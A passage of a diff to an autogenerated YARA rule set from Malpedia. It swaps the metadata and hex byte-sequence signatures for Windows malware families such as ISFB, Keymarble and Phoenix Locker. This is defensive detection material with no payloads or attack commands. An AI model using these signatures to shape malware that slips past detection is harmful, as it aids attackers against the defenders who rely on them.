license_url = "N/A" - logic_hash = "be7f9da8e0e3ad23e9493cdb12bfec902f58437483383423a4e4858dbe439d66" + logic_hash = "a33ff3dd3ba2b88105d1e9461a66c5947186b615b759549afa7c04ba76dcfedd" score = 75 quality = 75 tags = "FILE" @@ -155953,34 +158830,34 @@ rule MALPEDIA_Win_Xpan_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c001 c7450cffffffff 894108 8b4108 3b410c 0f83cb050000 0fb600 } - $sequence_1 = { 8bb018010000 85f6 0f8557010000 8b01 89cd 83f84d 0f870d1d0000 } - $sequence_2 = { 8b5d20 83e001 05ffffff7f 8903 8b451c c70004000000 807dbc00 } - $sequence_3 = { 8b442428 895c2404 89442408 ff15???????? 39c3 7247 } - $sequence_4 = { ffd5 83ec04 83fe05 75ea 8d7338 c7431cffffffff } - $sequence_5 = { 8b55d0 c645c201 0fbed8 0fb65210 e9???????? c645c100 c645c201 } - $sequence_6 = { 8b930c010000 88442418 be01000000 c683ff00000000 c7442404ff000000 891c24 89542408 } - $sequence_7 = { 0fb644242c 89442404 89f0 83c002 890424 e8???????? e9???????? } - $sequence_8 = { e9???????? 8d489f 80f905 0f874b0e0000 83e857 e9???????? 8b931c010000 } - $sequence_9 = { 31c0 e9???????? 8b44241c 897c243c 89442438 8d442438 898310010000 } + $sequence_0 = { 5d c20800 85f6 75b2 83ff10 8935???????? b8???????? } + $sequence_1 = { 8bec 8b0d???????? b8???????? 8b15???????? 57 8b3d???????? 83ff10 } + $sequence_2 = { 8aca c0e206 c0e902 80e10f 02c8 8a45eb 243f } + $sequence_3 = { b8???????? 0f43d1 b9???????? 2bc2 50 } + $sequence_4 = { 0f43c1 3d???????? 773e 83ff10 } + $sequence_5 = { 83ff10 ba???????? b8???????? 0f43d1 b9???????? 2bc2 } + $sequence_6 = { 80e10f 02c8 8a45eb 243f } + $sequence_7 = { ff750c 83ff10 ba???????? b8???????? 0f43d1 b9???????? 2bc2 } + $sequence_8 = { e8???????? 46 83fe03 7cec 8b4de0 } + $sequence_9 = { 0f854d0d0000 eb00 f30f7e442404 660f2815???????? 660f28c8 } condition: - 7 of them and filesize <3235840 + 7 of them and filesize <278528 } -rule MALPEDIA_Win_Isfb_Auto : FILE +rule MALPEDIA_Win_Tclient_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2206addc-4ea1-5ebc-8989-ba5f49383e7b" + id = "f2038e8d-aea1-548a-a845-014bf9e62586" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.isfb_auto.yar#L1-L1623" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tclient_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "dcaa8c2fe85dec9e7e215d7d6083b8c053dc5e8814c7849f4addcdf0f2d4a23f" + logic_hash = "d731098e1e4af77da640d6018efa5a27e1199a8bfd1426735ef45625c1645468" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -155992,212 +158869,32 @@ rule MALPEDIA_Win_Isfb_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? eb02 33c0 3bc7 741b 50 } - $sequence_1 = { 741b 50 33c0 e8???????? 3bc7 } - $sequence_2 = { ff75f0 ff75f4 6822010000 e9???????? ff7508 } - $sequence_3 = { 58 e8???????? 3bc7 7406 50 } - $sequence_4 = { 3bc7 7413 50 6a10 58 e8???????? } - $sequence_5 = { ff35???????? e8???????? 8bf0 3bf3 7443 6aff 68806967ff } - $sequence_6 = { 50 e8???????? 83c40c e8???????? 3bc7 } - $sequence_7 = { 6a64 ff15???????? a1???????? 85c0 7407 83ee64 } - $sequence_8 = { ff35???????? ff15???????? 85c0 a3???????? 7402 ffe0 c20400 } - $sequence_9 = { 5d 5b 59 c20400 8325????????00 6a00 68???????? } - $sequence_10 = { 7406 50 e8???????? 3bdf 7414 } - $sequence_11 = { a1???????? 85c0 751a 68???????? ff35???????? ff15???????? 85c0 } - $sequence_12 = { 3c05 7506 84e4 7704 3ac0 } - $sequence_13 = { c20400 55 8bec 83ec0c a1???????? 8365f800 } - $sequence_14 = { 2b55fc 8b7d10 0155fc 83451004 } - $sequence_15 = { 83e103 740d 51 50 ff7510 e8???????? 83c40c } - $sequence_16 = { 0155fc 83451004 83c004 49 8917 75e9 } - $sequence_17 = { 7417 8b10 2b55fc 8b7d10 } - $sequence_18 = { 3bc3 7512 e8???????? 3bc3 a3???????? } - $sequence_19 = { 895df4 0f84c7000000 56 53 } - $sequence_20 = { b8???????? 7505 b8???????? 53 bb60ea0000 } - $sequence_21 = { 68000f0000 e8???????? 8bd8 85db 895df4 0f84c7000000 } - $sequence_22 = { 837b240c 56 57 8b3b 897c241c 760a 8b4b20 } - $sequence_23 = { 894b34 8b4b24 2b4b28 894c2410 8b4b34 f6c140 } - $sequence_24 = { 58 e8???????? 85c0 740d 8906 83c604 } - $sequence_25 = { 8b442418 894110 836334f9 c7432c01000000 8b4334 } - $sequence_26 = { e8???????? 8b4320 897324 897328 83c40c 8974240c c6401a00 } - $sequence_27 = { 57 33ff 3bdf 7414 } - $sequence_28 = { ff35???????? 0fc8 50 a1???????? } - $sequence_29 = { 8a4604 2404 f6d8 1bc0 } - $sequence_30 = { c6400731 8b74241c 8b1e 6a00 ff37 ff15???????? 2b442414 } - $sequence_31 = { ff15???????? 8b442414 8b4c240c 8907 8b442418 } - $sequence_32 = { 83ec14 8364240400 53 8b5d0c 837b240c 56 } - $sequence_33 = { 2b442414 50 8b07 03442418 50 56 ff5310 } - $sequence_34 = { 837d0800 7408 ff7508 e8???????? 8bc7 5f 5e } - $sequence_35 = { 752f 8b450c 8930 eb33 } - $sequence_36 = { 74a3 33ff eb0b 33ff eb03 } - $sequence_37 = { 6a01 33db 53 ff35???????? e8???????? 8bf0 } - $sequence_38 = { 50 8d4508 50 53 8bc6 } - $sequence_39 = { 8bd1 83c128 4e 7404 3bd0 74e7 3bd0 } - $sequence_40 = { 488bcf c744242860ea0000 4c0f45c8 48895c2420 } - $sequence_41 = { 3bc8 7415 8b5210 3bd0 } - $sequence_42 = { 53 8bc6 e8???????? 85c0 7516 } - $sequence_43 = { 6a0b eb02 6a02 58 } - $sequence_44 = { 85ff 750e 837d0800 7408 } - $sequence_45 = { 488bcf ff15???????? 4c8964dd00 83c301 4885ff 4c8be7 } - $sequence_46 = { 498bcc ff15???????? 33db 66ba2000 } - $sequence_47 = { 415c 5f 5e 5d 5b c3 8b4754 } - $sequence_48 = { 75c4 48892e eb02 33db 488b0d???????? 885e08 } - $sequence_49 = { c21000 55 8bec 83ec14 a1???????? 53 } - $sequence_50 = { 53 b800080000 50 56 ff35???????? } - $sequence_51 = { e8???????? be01000000 8bc6 4883c440 415e } - $sequence_52 = { 33db 66ba2000 498bcc ff15???????? 4885c0 } - $sequence_53 = { e8???????? 85c0 742d ff75fc 6a0d } - $sequence_54 = { 742d ff75fc 6a0d 58 e8???????? 85c0 } - $sequence_55 = { ff15???????? 4885c0 488be8 7453 } - $sequence_56 = { 4c0f45c8 48895c2420 e8???????? 85c0 8bd8 } - $sequence_57 = { 51 50 57 6a01 ff75e0 68???????? e8???????? } - $sequence_58 = { ff15???????? bb01000000 498bcc eb07 83c301 488d4801 66ba2000 } - $sequence_59 = { 8bd5 488bcf bb57000000 e8???????? } - $sequence_60 = { e8???????? 3bc3 740f 8b35???????? 50 83c604 } - $sequence_61 = { a810 ff750c 7535 68???????? ff75f8 } - $sequence_62 = { ff75f8 ffd6 8b4df4 66c7015c00 } - $sequence_63 = { 8945e0 e8???????? 85c0 0f84dc000000 8b45e0 8d4de0 3bc1 } - $sequence_64 = { 33db 53 ff35???????? c745f408000000 ff15???????? 3bc3 8945f8 } - $sequence_65 = { 6641b85c00 33d2 488bcd ff15???????? } - $sequence_66 = { 50 83c604 e8???????? 3bfb } - $sequence_67 = { b90e010000 41b800000100 4889442420 e8???????? e9???????? } - $sequence_68 = { 6a01 e8???????? 85db 7423 8b0d???????? } - $sequence_69 = { 50 e8???????? 3bfb 7414 } - $sequence_70 = { 72c1 eb0c bb7f000000 eb05 bb7e000000 } - $sequence_71 = { 33d2 ff15???????? 488bdf 8bf7 483bdf } - $sequence_72 = { 4883c608 83fd05 72c1 eb0c } - $sequence_73 = { 3bc3 8945f4 741a ff750c 668918 68???????? } - $sequence_74 = { 50 8bd7 e8???????? eb02 33c0 3bc3 7413 } - $sequence_75 = { a840 0f84e2000000 8b7334 8d442418 50 8d442410 50 } - $sequence_76 = { 8b7508 e8???????? 33f6 3975fc } - $sequence_77 = { ff7510 57 ff750c 53 e8???????? 3bfe 740e } - $sequence_78 = { 0f8544010000 8b472c a801 742d ff37 e8???????? 85c0 } - $sequence_79 = { e8???????? 3bfe 740e 57 56 ff35???????? ff15???????? } - $sequence_80 = { ff5214 8bf7 8bfe e8???????? 5f 5e } - $sequence_81 = { 5b 8be5 5d c20800 8b4330 a804 0f8451ffffff } - $sequence_82 = { c744242000010000 ff15???????? 4883f8ff 488bf8 7442 } - $sequence_83 = { ff15???????? 53 56 ff35???????? ff15???????? 5b 5f } - $sequence_84 = { 3975fc 7410 ff75fc 56 ff35???????? ff15???????? 53 } - $sequence_85 = { 83bc248800000000 4c8b442440 488b542448 894c2430 } - $sequence_86 = { 752e 53 e8???????? 6a01 6a01 } - $sequence_87 = { 56 ff35???????? 8945f8 ff15???????? 8bd8 3bde } - $sequence_88 = { e8???????? 85c0 0f85d7000000 8b4604 } - $sequence_89 = { 7505 894720 eb0b 8b4f30 84c9 0f8992000000 } - $sequence_90 = { 83632800 e9???????? 8b4330 a840 0f84e2000000 8b7334 } - $sequence_91 = { 0f854affffff 894330 e9???????? 55 } - $sequence_92 = { c9 c20400 51 56 ff74240c } - $sequence_93 = { 4803df 410fb64101 33d2 488d0cc3 } - $sequence_94 = { 85d2 4d8bf1 458bf8 8bc2 } - $sequence_95 = { e8???????? 8d45fc 50 8b4508 e8???????? } - $sequence_96 = { 50 57 e8???????? e9???????? 68???????? } - $sequence_97 = { ff15???????? 488bcf 48870d???????? 483bcf } - $sequence_98 = { 33db 895d08 eb03 8b5d08 } - $sequence_99 = { 488d0cc3 48890d???????? 410fb64103 488d0cc3 } - $sequence_100 = { ff15???????? 4885db 740c 4c8b0d???????? e9???????? } - $sequence_101 = { c3 418bd8 4803df 410fb64101 } - $sequence_102 = { e8???????? 85c0 7507 33db 895d08 } - $sequence_103 = { 488bce ff15???????? 488b0d???????? 33d2 4c63c0 } - $sequence_104 = { 6a00 ff35???????? ff15???????? 33db 6a01 } - $sequence_105 = { 8a4b1c 488b4558 4c8b4d30 4c8b4510 } - $sequence_106 = { 448be8 418b4310 41394308 410f474308 } - $sequence_107 = { 488d0cc3 48890d???????? 410fb64102 488d0cc3 } - $sequence_108 = { 33d2 ff15???????? 483bc3 4c8be8 } - $sequence_109 = { 33d2 498bcc 498bfd e8???????? 493bc5 7405 } - $sequence_110 = { 5b c3 a1???????? 83c040 50 ff15???????? eb08 } - $sequence_111 = { 8b3d???????? 56 ffd7 53 56 } - $sequence_112 = { e8???????? 0945fc 47 83c304 3b3e 72dc 8b45fc } - $sequence_113 = { c9 c20400 53 56 8bf0 8a06 } - $sequence_114 = { 8bf1 05fefeffff 33db 33c9 } - $sequence_115 = { 8b02 43 8acb d3c0 33c6 33442410 8bf0 } - $sequence_116 = { ff15???????? 8ac3 5b c9 c20400 53 } - $sequence_117 = { 8bf0 8932 83c204 ff4c240c 75e6 5e 5b } - $sequence_118 = { 4533c9 4889442428 215c2420 4533c0 } - $sequence_119 = { 50 8d442430 50 8d442428 50 8d442428 } - $sequence_120 = { 480f45f2 832700 458be0 bb08000000 } - $sequence_121 = { ff15???????? 4c8d4c2450 4c8d442458 8d5001 488bce e8???????? 85c0 } - $sequence_122 = { ff15???????? 4883f8ff 4c8be0 0f8583000000 488b0d???????? 4d8bc5 } - $sequence_123 = { e9???????? 33c9 bb26040000 48870d???????? } - $sequence_124 = { ff15???????? 49bb00c0692ac9000000 488bcf 4c019c24d8010000 ff15???????? 6641b85c00 33d2 } - $sequence_125 = { 83c701 e9???????? 488b8424c8010000 498bcc bb01000000 4c8928 } - $sequence_126 = { ff15???????? 488d542440 488bcd ff15???????? 4883f8ff } - $sequence_127 = { 4c8bc7 33d2 ff15???????? 33ff 4885ff } - $sequence_128 = { 488bd6 ff15???????? eb14 488b0d???????? 4c8bc7 33d2 } - $sequence_129 = { 6a00 ff35???????? ffd3 8bd8 85db 7476 } - $sequence_130 = { 41b905000000 488bd8 ff15???????? 488bcb } - $sequence_131 = { 4c8be8 0f841c010000 448b05???????? 33d2 488bc8 4c33c7 e8???????? } - $sequence_132 = { 7416 a1???????? 83c004 50 be???????? } - $sequence_133 = { 498bcf ff15???????? 448bf0 488bce ff15???????? } - $sequence_134 = { 895df4 895df0 c745f857000000 bf19010000 } - $sequence_135 = { 7520 41390424 741a 498d4c2401 } - $sequence_136 = { 488b0d???????? 448bc0 8bd8 33d2 4983c001 } - $sequence_137 = { a1???????? 25efff0000 0bc2 e9???????? } - $sequence_138 = { 4c63c0 33d2 4983c00c ff15???????? } - $sequence_139 = { 215c2420 4533c9 4533c0 33d2 ff15???????? 85c0 7511 } - $sequence_140 = { 6a03 8935???????? 8935???????? 8935???????? } - $sequence_141 = { e9???????? 488bcb ff15???????? a810 } - $sequence_142 = { 803f2a 750b 4883c701 83c3ff } - $sequence_143 = { 41be01000000 33c9 418bd6 ff15???????? } - $sequence_144 = { 53 56 8bf1 05fefeffff } - $sequence_145 = { 57 4154 4155 4156 4883ec50 488bf1 } - $sequence_146 = { 5e 33c0 c9 c20400 55 8bec 51 } - $sequence_147 = { 4889040f 4883c708 492bf6 75db } - $sequence_148 = { 8bc6 e8???????? 8b06 8b08 57 ff7510 } - $sequence_149 = { 750a 488bcf e8???????? 8bd8 488b0d???????? 4c8bc7 } - $sequence_150 = { 5f c20400 55 8bec 83e4f8 81ec9c000000 } - $sequence_151 = { 488d542438 488bcb e8???????? eb02 } - $sequence_152 = { 8bc7 e8???????? 8d4618 8b08 50 51 } - $sequence_153 = { 6a20 40 50 ffd6 } - $sequence_154 = { 488bd3 ff15???????? 488b8c2428020000 8bf0 ff15???????? } - $sequence_155 = { 7417 4863461c 2b6e1c 4c03e8 488b4610 48894718 } - $sequence_156 = { 21442428 488b8c2428020000 488364242000 448d4803 } - $sequence_157 = { 21b42410020000 eb0d ff15???????? 89842410020000 } - $sequence_158 = { 488bcb ff15???????? 8bc8 ff15???????? 21b42410020000 } - $sequence_159 = { 4885c9 7405 e8???????? 4883c428 c3 488d82204a0000 488982284a0000 } - $sequence_160 = { 418bcd e8???????? 8b842410020000 4c8d9c24f0010000 } - $sequence_161 = { 488b15???????? 4c8d842428020000 48c7c101000080 ff15???????? } - $sequence_162 = { e8???????? 5e 5f c9 c3 51 53 } - $sequence_163 = { 50 57 6a01 ff7508 ffd6 85c0 742b } - $sequence_164 = { 448bcf 4533c0 e8???????? 483bc3 488905???????? 0f84dc000000 } - $sequence_165 = { e8???????? 488b0d???????? 4c8bc3 33d2 ff15???????? 488b0d???????? 4c8bc7 } - $sequence_166 = { 4c8d40cc 33d2 33c9 e8???????? 85c0 0f8561010000 } - $sequence_167 = { 7415 397b44 7510 488b0b e8???????? 85c0 0f859b000000 } - $sequence_168 = { ffc1 807c043000 7531 8bd3 2bd1 8917 } - $sequence_169 = { 84c0 0f89a3000000 8b434c a804 7415 397b44 7510 } - $sequence_170 = { 7505 217b3c eb0b 8b434c 84c0 0f89a3000000 8b434c } - $sequence_171 = { 85c0 0f8561010000 8b4348 a801 742c } - $sequence_172 = { 742c 488b0b e8???????? 85c0 0f85e8000000 488b4608 488b0e } - $sequence_173 = { 85c0 0f859b000000 4863533c 488b4608 } - $sequence_174 = { ba10000000 488bc8 e8???????? 48898424e0010000 4885c0 } - $sequence_175 = { 4c8d442470 488d542440 e8???????? 8bd8 85c0 } - $sequence_176 = { 33d2 468d44385f ff15???????? 4c8bf0 } - $sequence_177 = { 488bf8 4885c0 7427 488d542420 b901020000 ff15???????? 85c0 } - $sequence_178 = { 4c89642448 ff15???????? 8bd8 83f8ff } - $sequence_179 = { 488bc8 458bf9 33ff e8???????? 4c8be8 4885c0 7508 } - $sequence_180 = { 8bd8 85c0 0f85f3010000 4c8b842418020000 8d5808 488d8c24b0000000 4d85c0 } - $sequence_181 = { 448d4256 ff15???????? 4c8be0 4885c0 0f8405010000 ff15???????? } - $sequence_182 = { 90 57 51 8b742420 8b7c241c 8b4c2434 } - $sequence_183 = { 56 57 51 90 8b742428 } - $sequence_184 = { 8b5508 035510 8b3a 83c204 } - $sequence_185 = { 01f2 6683f9ff 896c2428 7508 } - $sequence_186 = { eb67 8044241301 0fb6ca 01cb 30c9 eb59 } - $sequence_187 = { 83c304 894c2410 56 90 } - $sequence_188 = { 5e 01d5 01d3 b101 3b5c2428 0f8266ffffff } - $sequence_189 = { 8b5d10 6601da c1ca03 895510 3010 } + $sequence_0 = { 8be5 5d c21800 b8???????? e8???????? 83ec70 53 } + $sequence_1 = { 6685f6 7411 0fb7c2 42 885c0804 0fb7c2 42 } + $sequence_2 = { e9???????? 6a44 8d442444 53 50 e8???????? 33c0 } + $sequence_3 = { 50 8d0419 57 50 e8???????? 83c40c b880000000 } + $sequence_4 = { 894db0 2345a8 33c2 c1c105 034e28 81c29979825a 8b75a8 } + $sequence_5 = { 8b00 2bc1 8d4a01 3bc1 0f4cc8 894dec 85c9 } + $sequence_6 = { 59 59 85c0 7443 e9???????? 85f6 741e } + $sequence_7 = { 57 e8???????? 8b4304 2b4508 50 ff7508 } + $sequence_8 = { 6bc930 8b0495c0a04700 c644012801 8b0495c0a04700 897c0118 8bfe e9???????? } + $sequence_9 = { 89bebc010000 8a8398000000 888675030000 0fb68398000000 50 8d4366 50 } condition: - 7 of them and filesize <2940928 + 7 of them and filesize <1063936 } -rule MALPEDIA_Win_Cryptoshield_Auto : FILE +rule MALPEDIA_Win_Unidentified_106_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "96d07897-e994-52cb-aaa7-059e98a50194" + id = "149fd261-d790-5329-9f62-f83b72c17c68" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptoshield_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_106" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_106_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "306896178ef65ef3c9170a20c235107c29dca1bfe925c06dc43c71750e345a6d" + logic_hash = "b7794c4f304d97457540366e3546931a6b0930939bfed6f5754198d0fc46abff" score = 75 quality = 75 tags = "FILE" @@ -156211,32 +158908,32 @@ rule MALPEDIA_Win_Cryptoshield_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b18 8b45fc 85c0 740e } - $sequence_1 = { 50 ffd7 83c40c 8d442418 50 8d84242c020000 68???????? } - $sequence_2 = { 50 8d442428 50 ff15???????? 8d842430040000 } - $sequence_3 = { 85c0 7461 ff7508 6a40 ff15???????? } - $sequence_4 = { 750b 83c202 66833a00 75ce eb08 } - $sequence_5 = { 6a00 6a23 50 6a00 ff15???????? 8d85f4fdffff 50 } - $sequence_6 = { b90a000000 83f801 0f44f1 8b4dfc } - $sequence_7 = { be09000000 8bc6 5e 8b4dfc 33cd e8???????? 8be5 } - $sequence_8 = { 56 6814010000 33f6 8d85e0feffff 56 } - $sequence_9 = { 56 ff15???????? 85ff 0f45df 5f 5e 8bc3 } + $sequence_0 = { 8bc2 3bd5 7d14 2bea 33d2 448bc5 49c1e002 } + $sequence_1 = { d0250000ffff 3d00000d00 740e 8b4b04 53 e8???????? 413bc7 } + $sequence_2 = { e8???????? 488b8bf8000000 4889bbf0000000 e8???????? 488b8b00010000 4889bbf8000000 e8???????? } + $sequence_3 = { e8???????? e8???????? 8bc8 b881808080 f7e9 03d1 c1fa07 } + $sequence_4 = { 8bc1 418d140e 4803c6 41b800100000 66440b833c040000 4889442438 8bc2 } + $sequence_5 = { a806 0f85cf020000 bafbff0000 6623c2 6683c802 66898108030000 33c0 } + $sequence_6 = { 488d442448 4889442428 4c8bcb 488d442430 418bd7 498bce 4889442420 } + $sequence_7 = { e8???????? 85c0 7920 488b0f 488d5710 4885d2 0f8454fbffff } + $sequence_8 = { e9???????? 498b5f08 be02000000 440fb7f5 4d03f3 4180fc06 7508 } + $sequence_9 = { 90 eb02 eb00 498bc4 488b5c2478 488bac2480000000 4883c440 } condition: - 7 of them and filesize <131072 + 7 of them and filesize <27402240 } -rule MALPEDIA_Win_Afrodita_Auto : FILE +rule MALPEDIA_Win_Keymarble_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a57e10f8-454f-5804-9e05-9ca06675125c" + id = "25735efc-9b7e-5c4e-843b-1618e0690062" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.afrodita_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.keymarble_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "5b27d8ca339092e6723ab16dacd8e13cc60f1f330873451b2d099d87287bfb55" + logic_hash = "6744b9f4fc70c631928ab5473ea2bd7eecc2671462bf651b9238352600b5d250" score = 75 quality = 75 tags = "FILE" @@ -156250,32 +158947,32 @@ rule MALPEDIA_Win_Afrodita_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83e615 83ce02 89710c 23c6 74a5 a804 740a } - $sequence_1 = { e8???????? 56 8d8558ffffff c745fc05000000 57 83cb08 50 } - $sequence_2 = { e8???????? eb02 33ff 8bb57cffffff c745fcffffffff 8b4e2c 85c9 } - $sequence_3 = { 8d4f10 e8???????? 8b0f 8b4904 03cf 85c0 7454 } - $sequence_4 = { 0f1040c0 0f1149a0 0f104c30c0 8b75e8 660fefc8 0f1040d0 0f114c30c0 } - $sequence_5 = { 897304 c6430801 53 8d4de4 } - $sequence_6 = { 8b4b08 8b7b0c 897df8 894dfc 3bce } - $sequence_7 = { e8???????? 83c40c c744be0400000000 c704be00000000 5e 5b } - $sequence_8 = { 50 8bcb ff5720 0375d4 8bce e8???????? } - $sequence_9 = { 894f04 8bc7 e9???????? 83f854 0f8fdc010000 83f853 0f8dea020000 } + $sequence_0 = { ff15???????? 50 e8???????? 83c404 56 6a40 } + $sequence_1 = { ff15???????? 50 e8???????? 83c404 56 6a40 ff15???????? } + $sequence_2 = { e8???????? 83c404 56 6a40 ff15???????? } + $sequence_3 = { 83c404 e8???????? 8d3470 81e6ffffff7f } + $sequence_4 = { 50 ff15???????? 68???????? 6a40 } + $sequence_5 = { 83c408 85c0 7407 bb7a452301 } + $sequence_6 = { 50 e8???????? 83c404 56 6a40 } + $sequence_7 = { ff15???????? 50 ff15???????? 68???????? 6a40 } + $sequence_8 = { 83c404 56 6a40 ff15???????? } + $sequence_9 = { 6a00 6a03 6800000040 57 ffd6 } condition: - 7 of them and filesize <2334720 + 7 of them and filesize <1146880 } -rule MALPEDIA_Win_Vyveva_Auto : FILE +rule MALPEDIA_Win_Phoenix_Locker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5f920383-d05c-5c69-8d2c-6a773f2538b6" + id = "34d54537-0c22-56ee-a952-e063e1672ba8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vyveva_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_locker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.phoenix_locker_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "9d5c74e05efbe3ba7525bfb04e432ddba69e01227882b7ebe7ef3564991f92e2" + logic_hash = "30c99eed67f01ec94c0d1a86e9de20b1f5e3b05899cb4448846bf96ce3ca2f7f" score = 75 quality = 75 tags = "FILE" @@ -156289,32 +158986,32 @@ rule MALPEDIA_Win_Vyveva_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 58 ff7008 5a 8916 3b4808 7405 } - $sequence_1 = { 51 8f00 8b4c2408 85c9 7407 51 8f4004 } - $sequence_2 = { 57 56 51 55 59 e8???????? ff30 } - $sequence_3 = { 56 59 50 e8???????? 8d8c2494010000 6a04 } - $sequence_4 = { 740a 394424fc 7404 894424fc 83ec04 5d 83fdff } - $sequence_5 = { 83ec38 8b15???????? 8d442404 55 56 } - $sequence_6 = { 2bce 59 7409 33c9 8d4c0e04 83e904 ff5004 } - $sequence_7 = { 6a00 52 50 6a06 e8???????? 83c404 ffd0 } - $sequence_8 = { 59 c644247801 e8???????? 8b4c2434 8b442430 8d542428 894c242c } - $sequence_9 = { 7408 c70100000000 0101 83c008 85c0 7403 55 } + $sequence_0 = { 480fabc8 48ffc8 4180d05d 488d542420 488b01 66442bc4 } + $sequence_1 = { b91d692dbc 4d0f45e7 4533c9 e8???????? 4c8b6c2438 4c8d442440 413bc7 } + $sequence_2 = { 6681942400000000c64d 66c18c2400000000d9 66c184240000000074 e8???????? e2ac 1234ca 99 } + $sequence_3 = { 4d8d8424b602a3ea 660fbeca 488bcb e9???????? e8???????? 8bd5 498d8c1cb602a3ea } + $sequence_4 = { e9???????? ff15???????? 33c9 4180fa13 3bc1 0f8417000000 488b4c2468 } + $sequence_5 = { 68d30f1c2f 4881842430000000bd5eeb17 66c1bc245800000025 4159 415f 4159 4159 } + $sequence_6 = { 0f8539000000 8d4d39 664181d42122 f9 8d455b 4d63e0 } + $sequence_7 = { 68d701373c 48818424080000003feaebff 55 c0e254 5a 5a c3 } + $sequence_8 = { e8???????? 4881842418000000aa78f72a 488b7c2428 48c74424281256ce88 68d72a8642 48c1a42400000000ef 689b25ad02 } + $sequence_9 = { e8???????? 4155 4151 9c 49b98059c32d64378851 e8???????? 4c0fbbea } condition: - 7 of them and filesize <360448 + 7 of them and filesize <3702784 } -rule MALPEDIA_Win_Entryshell_Auto : FILE +rule MALPEDIA_Win_Hotwax_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "602f60d0-cc33-528b-8fdb-8d928745f559" + id = "34df7b39-b5de-5d0e-aea3-1ec834745896" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.entryshell" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.entryshell_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hotwax_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "870b124d6520583c6a18845739a5248302a0431048dbb7822501065378b2f353" + logic_hash = "f7aa59232edd43ba4670389edd9f2f755cdf2f70e16334cd9db9000bdc1ab730" score = 75 quality = 75 tags = "FILE" @@ -156328,32 +159025,32 @@ rule MALPEDIA_Win_Entryshell_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85db 7517 53 8d95e4dfffff 8b8d8cddffff } - $sequence_1 = { 771d 8d8290c72501 8d5001 660f1f440000 } - $sequence_2 = { 83c40c 8d8424a8080000 50 6804010000 ff15???????? 8d442450 50 } - $sequence_3 = { 8b46f8 0fb684054fffffff 8842fd 83ef01 75a1 0f1003 53 } - $sequence_4 = { 83c404 84c0 0f8495010000 8bbdf4efffff 85ff 0f84eefcffff 6a20 } - $sequence_5 = { e8???????? 59 83cfff 897de4 33c9 894dfc 8b049d78512501 } - $sequence_6 = { 8945f8 53 8b5d08 0f57c0 56 57 895de8 } - $sequence_7 = { 83c40c 8d4ffe 668b4102 8d4902 6685c0 75f4 e9???????? } - $sequence_8 = { 8a0445399f2401 eb02 32c0 0fb64d0c 0fb6c0 6bc009 03c1 } - $sequence_9 = { 02d2 029013800000 02d2 029014800000 02d2 029015800000 02d2 } + $sequence_0 = { 7e74 817d0063736de0 7528 48833d????????00 741e 488d0d5dee0000 } + $sequence_1 = { 488bd7 ff15???????? 418d8770050000 4489bdcc040000 c745a400080000 8945a0 } + $sequence_2 = { 4889842410030000 488bf9 488d8c2401020000 33d2 41b803010000 c684240002000000 } + $sequence_3 = { 488bd9 4885c0 7479 488d0d7fe50000 483bc1 746d 488b8310010000 } + $sequence_4 = { 4533db 488d9424f0000000 41b803010000 44895c2440 4c895c2448 ff15???????? 